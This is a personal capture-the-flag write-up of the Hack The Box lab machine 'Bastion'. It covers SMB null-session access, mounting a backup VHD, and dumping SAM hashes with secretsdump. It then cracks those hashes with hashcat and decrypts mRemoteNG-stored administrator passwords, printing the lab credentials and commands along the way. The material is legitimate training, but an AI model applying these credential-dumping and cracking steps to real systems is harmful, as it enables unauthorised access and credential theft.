This is a writeup on how i solved Bastion from HacktheBox.
Hack the Box is an online platform where you practice your penetration testing skills.
As I always do, I try to explain how I understood the concepts here from the machine because I want to really understand how things work. So please, if I misunderstood a concept, please let me know. Your corrections are very welcome.
About the box
Bastion is a fairly easy box which teaches basic penetration testing concepts. I enjoyed working on it because it’s a Windows machine, as I find them more amusing than Unix ones.
#TLDR
Initial foothold: A backup share which allows null sessions, the share contains a VHD
User: Attaching the VHD, then dumping hashes from the SAM database using Impacket’s secretsdump.py
Root: Through enumeration, found mRemoteNG program and decrypting the stored Admin password in its confCons.xml#Initial Foothold
As usual, I run an Nmap scan, saving it to my Nmap directory:
nmap -sV -sC -oA nmap/initial 10.10.10.134The output is:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: -40m01s, deviation: 1h09m14s, median: -3s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2019-05-02T07:14:20+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-05-02 05:14:21
|_ start_date: 2019-05-02 04:07:48
Open ports are 22, 135, 139 and 445. It uses OpenSSH for Windows, RPC, and SMB. I first check if I can list shares by a null session using smbclient. A null session doesn’t require any password. The -L flag lists the shares.
smbclient -L 10.10.10.134When prompted for a password, just press enter.
Seeing the Backups share, I connect to the SMB share using smbclient.
smbclient \\\\10.10.10.134\\BackupsI can see a note.txt, a .tmp file and WindowsImageBackup. The .tmp file might be a remnant which is generated upon connection of our SMB session. The note.txt seems a note for Sysadmins to not transfer the entire backup locally, since the VPN is too slow. This will make more sense later.
Investigating the files under WindowsImageBackup, I find a .vhd file under the L4mpje-PC\Backup 2019–02–22 124351:
The .vhd file is more than 5GB, which is a pain to download locally especially going thru a VPN.
Since this is a Windows machine, I decided to attach the .vhd file using a Windows host. I configured OpenVPN on my Windows host and then connected to the VPN.
I then accessed the share using Windows:
You can also type in the File explorer the location of the share, so I can view files in a much easier way.
I can view the files inside the VHD by attaching it. You can read more about here: https://docs.microsoft.com/en-us/windows-server/storage/disk-management/manage-virtual-hard-disks
For Windows 10, you can right click the Windows logo on the lower left of the Desktop and choose Disk Management then Action → Attach VHD. You will be prompted with a dialog box. Enter the exact path of the .vhd.
\\10.10.10.134\Backups\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhdAfter it loads, you can see a new Disk loaded in the Disk Management.
Note that if you mount the share on Z: (net use Z: \\10.10.10.134\Backups) and then specify the location as used below, it will not work.
Z:\\WindowsImageBackup\L4mpje-PC\Backup 2019–02–22 124351\9b9cfbc4–369e-11e9-a17c-806e6f6e6963.vhd
Getting User:
I can now traverse in the VHD.
Viewing the Desktop of the User L4mpje, it’s empty.
After checking the directories, I found C:\Windows\ System32\config is accessible. I copy the SAM and system files, as I can get Windows credentials from these 2 files. SAM contains the hashed passwords and the SYSTEM file stores the decryption key(boot key). You can learn more about it here:
SAM : https://en.wikipedia.org/wiki/Security_Account_Manager
I copy the files locally to my Kali machine. I can just drag and drop files because of the attached VHD. In the case I have access from a command line, I can use the commands to below to extract the file on a location I can read and write, then transfer it to my machine.
reg save hklm\sam <output location>
reg save hklm\system <output location> I now use secretsdump.py from Impacket to get the creds. Note that secretsdump allows remote dumping of SAM hashes as long as it is accessible thru SMB but since we have it locally, I use the LOCAL option. I invoke:
secretsdump.py -sam SAM -system LOCAL
And I get NT hashes for the users Administrator, Guest, L4mpje and I can crack the NT hashes using Hashcat. Note that Administrator and Guest have the same NT hash. Learn more about NT hashes by reading through these:
I save the NT hashes in a text file:
From my Windows machine:
hashcat64.exe -a 3 -m 1000 ..\bastion.txt ..\rockyou.txt
I now have valid creds:
L4mpje:bureaulampjeThe creds works for SMB, RPC and most importantly, SSH.
Logging in to SSH, I can now read user.txt:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.l4mpje@BASTION C:\Users\L4mpje>dir
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487Directory of C:\Users\L4mpje22-02-2019 14:50 <DIR> .
22-02-2019 14:50 <DIR> ..
22-02-2019 16:26 <DIR> Contacts
22-02-2019 16:27 <DIR> Desktop
22-02-2019 16:26 <DIR> Documents
22-02-2019 16:26 <DIR> Downloads
22-02-2019 16:26 <DIR> Favorites
22-02-2019 16:26 <DIR> Links
22-02-2019 16:26 <DIR> Music
22-02-2019 16:26 <DIR> Pictures
22-02-2019 16:26 <DIR> Saved Games
22-02-2019 16:26 <DIR> Searches
22-02-2019 16:26 <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 11.256.795.136 bytes freel4mpje@BASTION C:\Users\L4mpje>cd Desktopl4mpje@BASTION C:\Users\L4mpje\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487Directory of C:\Users\L4mpje\Desktop22-02-2019 16:27 <DIR> .
22-02-2019 16:27 <DIR> ..
23-02-2019 10:07 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 11.256.795.136 bytes freel4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
9bfe57d....
Getting Root:
I first run an enumeration script to find anything useful. I used JAWS from https://github.com/411Hall/JAWS.
To get the file to run in the Bastion machine, I host the script using python3 http.server then start Powershell:
Then invoke commands to, fetch and execute the file from the http.server. JAWS may take a while to load.
Skimming through the output, the mRemoteNG program stands out.
I check where I have full control and modify access.
I dig more into mRemoteNG by searching for articles about it. You can read more about it here: https://mremoteng.org/
After much reading, I find that it stores passwords under the location C:\users\<username>\AppData\Roaming\mRemoteNG\confCons.xml.
Verifying:
Reading what’s inside, I can see a field Username and Password for Administrator and L4mpje.
Administrator:aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==L4mpje:yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB
I then looked for a way to decrypt the password, and came across this: https://github.com/kmahyyg/mremoteng-decrypt. I decrypt the passwords:
Since I have credentials for Administrator, I SSH using it, and now I can read root.txt..
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.administrator@BASTION C:\Users\Administrator>type Desktop/root.txt
The syntax of the command is incorrect.administrator@BASTION C:\Users\Administrator>^Ldir
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487Directory of C:\Users\Administrator25-04-2019 06:08 <DIR> .
25-04-2019 06:08 <DIR> ..
23-02-2019 10:40 <DIR> Contacts
23-02-2019 10:40 <DIR> Desktop
23-02-2019 10:40 <DIR> Documents
23-02-2019 10:40 <DIR> Downloads
23-02-2019 10:40 <DIR> Favorites
23-02-2019 10:40 <DIR> Links
23-02-2019 10:40 <DIR> Music
23-02-2019 10:40 <DIR> Pictures
23-02-2019 10:40 <DIR> Saved Games
23-02-2019 10:40 <DIR> Searches
23-02-2019 10:40 <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 11.255.562.240 bytes freeadministrator@BASTION C:\Users\Administrator>cd Desktopadministrator@BASTION C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487Directory of C:\Users\Administrator\Desktop23-02-2019 10:40 <DIR> .
23-02-2019 10:40 <DIR> ..
23-02-2019 10:07 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 11.255.562.240 bytes freeadministrator@BASTION C:\Users\Administrator\Desktop>type root.txt
958850b9181....
So that’s how I solved Bastion from Hack the Box. I hoped you learned something from this walk through. Thanks for reading my writeup! Cheers! 🍺
